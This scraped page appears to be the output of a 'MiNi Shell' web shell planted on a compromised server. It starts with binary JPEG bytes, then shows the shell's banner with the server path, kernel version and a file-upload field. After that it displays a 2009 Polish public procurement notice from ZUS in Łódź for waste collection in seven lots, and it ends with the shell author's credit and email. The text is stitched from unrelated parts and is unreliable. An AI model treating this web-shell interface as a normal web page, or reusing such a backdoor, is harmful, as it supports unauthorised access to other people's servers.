JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/37036-N-2009.html

<p class="kh_header"><b>Łódź: Wywóz nieczystości stałych oraz odbiór odpadów (w tym odpadów niebezpiecznych) i przejęcie obowiązku gospodarowania tymi odpadami, prowadzonego z możliwością składania ofert częściowych w 7 pakietach</b><br>
<b>Numer ogłoszenia: 37036 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> ZUS I Oddział w Łodzi , ul. Zamenhofa 2, 90-431 Łódź, woj. łódzkie, tel. 042 6382740, faks 042 6382665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz nieczystości stałych oraz odbiór odpadów (w tym odpadów niebezpiecznych) i przejęcie obowiązku gospodarowania tymi odpadami, prowadzonego z możliwością składania ofert częściowych w 7 pakietach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wywóz nieczystości stałych oraz odbiór odpadów ( w tym odpadów niebezpiecznych) i przejęcie obowiązku gospodarowania tymi odpadami, prowadzonego z możliwością składania ofert częściowych w 7 pakietach:

Pakiet I	- wywóz nieczystości stałych z budynków ZUS I Oddział w Łodzi, położonych w Łodzi przy ul. Zamenhofa 2 oraz ul. Wólczańskiej 225,

Pakiet II	- wywóz nieczystości stałych z budynków ZUS I Oddział w Łodzi, położonych w Zgierzu przyul. Długiej 43 oraz ul. Chopina 5,

Pakiet III	- wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Brzezinach przy ul. Głowackiego 43,

Pakiet IV	- wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Kutnie przy ul. Jagiełły 12,
Pakiet V	- wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Łowiczu przy ul. Kaliskiej 8,

Pakiet VI	- wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Łęczycy przy ul. Zachodniej 8,

Pakiet VII - odbiór odpadów (w tym odpadów niebezpiecznych) i przejęcie od Zamawiającego obowiązku gospodarowania odpadami oraz odpowiedzialności z tym związanej, z budynków ZUS I Oddział w Łodzi, położonych w Łodzi przy ul. Zamenhofa 2, ul. Wólczańskiej 225 i ul. Brzezińskiej 5/15.

Szczegółowe zasady realizacji przedmiotu zamówienia dla Pakietu I-VI określa Wzór umowy dla Pakietu I-VI.
Szczegółowe zasady realizacji przedmiotu zamówienia dla Pakietu VII określa Wzór umowy dla Pakietu VII.

Zamawiający dopuszcza możliwość składania ofert częściowych na wybrany Pakiet lub na wybrane Pakiety.
Wielkość zamówienia: Wartość niniejszego zamówienia (postępowanie oznaczone nr sprawy 210000/370/3/2009/TG/NA-2) wynosi 34.535,18 euro, w tym:

PAKIET I         - 19 426,39 euro

PAKIET II        - 3 414,12 euro

PAKIET III       - 727,60 euro

PAKIET IV       - 1 343,26 euro

PAKIET V        - 727,60 euro

PAKIET VI       - 671,63 euro

PAKIET VII      - 8 224,58 euro.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 pkt 1 - 4 uPzp, co potwierdzą przez złożenie:  1.1.oświadczenia, o którym mowa w pkt 3.2. SIWZ, a w przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, również pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,  1.2.dokumentów wymaganych w pkt 3.3.-3.8. SIWZ (stosownie do wybranego Pakietu/-ów), spełniających wymogi rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605 z późn. zm.), zwanego dalej Rozporządzeniem.
2.W zakresie warunku określonego w art. 22 ust. 1 pkt 1 uPzp, Wykonawcy winni posiadać uprawnienia do wykonywania działalności tj.: 
2.1.W Pakietach I - VI       
a)  zezwolenie na wykonywanie działalności gospodarczej dotyczącej odbierania odpadów komunalnych od właścicieli nieruchomości wydane w formie decyzji wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce świadczenia usług wymagane na podstawie ustawy z 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm.)       
lub           
przedstawić oświadczenie potwierdzające, że nie są zobowiązani do posiadania takiego zezwolenia - z uzasadnieniem prawnym i faktycznym.      
b) zezwolenie na prowadzenie działalności gospodarczej dotyczącej transportu odpadów wydane przez właściwego starostę, wymagane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach (tj. Dz. U. z 2007 r. Nr 39, poz. 251 z późn. zm.)        
lub             
przedstawić oświadczenie potwierdzające, że nie są zobowiązani do posiadania takiego zezwolenia - z uzasadnieniem prawnym i faktycznym.
2.2. W Pakiecie VII zezwolenie do wykonywania działalności gospodarczej dotyczącej gospodarki odpadami obejmującej również odpady niebezpieczne wymagane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach lub przedstawić oświadczenie potwierdzające, że nie są zobowiązani do posiadania takiego zezwolenia - z uzasadnieniem prawnym i faktycznym.
3.W przypadku, gdy Wykonawca nie posiada odpowiedniego zezwolenia, o którym mowa w pkt 2 istnieje możliwość zawiązania konsorcjum w celu ubiegania się o udzielenie zamówienia. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. spółka cywilna, konsorcjum), wystarczy że warunki określone w pkt 2 spełni jeden z Wykonawców lub Wykonawcy spełnią je łącznie.
4. Ocena spełnienia ww. warunków odbywać się będzie metodą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie  o spełnianiu warunków udziału w postępowaniu w związku 
z art. 22 ust. 1  pkt 1-4 uPzp (wypełnione i podpisane) - do wykorzystania wzór (druk) stanowiący Załącznik Nr 2 do SIWZ. W przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, winien on przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
2. Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - w rozumieniu Rozporządzenia,
3. Aktualne zaświadczenie właściwego oddziału ZUS lub KRUS - w rozumieniu Rozporządzenia,
4. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego -w rozumieniu Rozporządzenia,
5. Aktualne zezwolenie na wykonywanie działalności gospodarczej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wydane w formie decyzji wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce świadczenia usług lub oświadczenie Wykonawcy potwierdzające, że nie jest zobowiązany do posiadania takiego zezwolenia - z uzasadnieniem prawnym i faktycznym (Pakiet I-VI).
6. Aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów wydane przez właściwego starostę, wymagane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach lub oświadczenie Wykonawcy potwierdzające, że nie jest zobowiązany do posiadania takiego zezwolenia - z uzasadnieniem prawnym i faktycznym (Pakiet I-VI).
7. Aktualne zezwolenie do wykonywania działalności gospodarczej w zakresie gospodarki odpadami obejmującej również odpady niebezpieczne wymagane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach lub oświadczenie Wykonawcy potwierdzające, że nie jest zobowiązany do posiadania takiego zezwolenia - z uzasadnieniem prawnym i faktycznym (Pakiet VII).

Wykonawca  mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, odpowiednio do  przepisów Rozporządzenia, zamiast dokumentów wymienionych w pkt 2, 3 i 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Dokument, o którym mowa w pkt 1) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 2) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1) i 2), Wykonawca zastępuje je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Oświadczenie winno być sporządzone z zachowaniem terminów jak dla dokumentów wymienionych w pkt 1) i 2)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódź 90-431, ul. Zamenhofa 2 p. XI, pok. 1114.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 12:00, miejsce: ZUS I Oddział w Łodzi, ul. Zamenhofa 2, 90-431 Łódź, p. XI, pok. 1114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.     Wymagany okres realizacji zamówienia 24 miesiące od podpisania umowy, jednak nie wcześniej niż:

Pakiet I 	- od dnia 16.03.2009 r.

Pakiet II	- od dnia 01.04.2009 r.

Pakiet III	- od dnia 16.03.2009 r.

Pakiet IV	- od dnia 04.05.2009 r.

Pakiet V	- od dnia 04.05.2009 r.

Pakiet VI	- od dnia 01.04.2009 r.

Pakiet VII- od dnia 01.04.2009 r.

2.Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: 
Łódź 90-431, ul. Zamenhofa 2 p. XI, pok. 1114

3.W niniejszym postępowaniu dopuszcza się by oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazywali faksem. Zawsze dopuszczalna jest forma pisemna. Każda ze Stron na żądanie drugiej winna niezwłocznie potwierdzić fakt otrzymania faksu. Nie dopuszcza się możliwości porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń i dokumentów drogą elektroniczną.

4.Osoby uprawnione do porozumiewania się z wykonawcami: 

Pan Bartosz Dziadecki, tel. 042/ 638 29 65,  

Pani Elżbieta Kubiak oraz Pan Remigiusz Lewandowski, tel. 042/ 638 27 40, faks  042/ 638 26 65. 5.      
Miejsce i termin otwarcia ofert:          
ZUS I Oddział w Łodzi, ul. Zamenhofa  2, piętro XI, pok. nr 1112B, dnia 06.03.2009 r. o godz. 12.30.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wywóz nieczystości stałych z budynków ZUS I Oddział w Łodzi, położonych w Łodzi przy 
ul. Zamenhofa 2 oraz ul. Wólczańskiej 225.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z budynków ZUS I Oddział w Łodzi, położonych w Łodzi przy ul. Zamenhofa 2 oraz ul. Wólczańskiej 225.Wartość zamówienia: 19 426,39 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu I-VI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wywóz nieczystości stałych z budynków ZUS I Oddział w Łodzi, położonych w Zgierzu przy 
ul. Długiej 43 oraz ul. Chopina 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z budynków ZUS I Oddział w Łodzi, położonych w Zgierzu przy ul. Długiej 43 oraz ul. Chopina 5.Wartość zamówienia: 3 414,12 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu I-VI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego
w Brzezinach przy ul. Głowackiego 43.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Brzezinach przy ul. Głowackiego 43.Wartość zamówienia: 727,60 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu I-VI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego
w Kutnie przy ul. Jagiełły 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Kutnie przy ul. Jagiełły 12.Wartość zamówienia: 1 343,26 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu I-VI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego
w Łowiczu przy ul. Kaliskiej 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Łowiczu przy ul. Kaliskiej 8.Wartość zamówienia: 727,60 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu I-VI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego
w Łęczycy przy ul. Zachodniej 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z budynku ZUS I Oddział w Łodzi, położonego w Łęczycy przy ul. Zachodniej 8.Wartość zamówienia: 671,63 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu I-VI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> odbiór odpadów (w tym odpadów niebezpiecznych) i przejęcie od Zamawiającego obowiązku gospodarowania odpadami oraz odpowiedzialności z tym związanej, z budynków ZUS I Oddział 
w Łodzi, położonych w Łodzi przy ul. Zamenhofa 2, ul. Wólczańskiej 225 i ul. Brzezińskiej 5/15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór odpadów (w tym odpadów niebezpiecznych) i przejęcie od Zamawiającego obowiązku gospodarowania odpadami oraz odpowiedzialności z tym związanej,z budynków ZUS I Oddział w Łodzi, położonych w Łodzi przy ul. Zamenhofa 2, ul. Wólczańskiej 225 i ul. Brzezińskiej 5/15.Wartość zamówienia: 8 224,58 euro. Szczegółowe zasady realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu VII.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com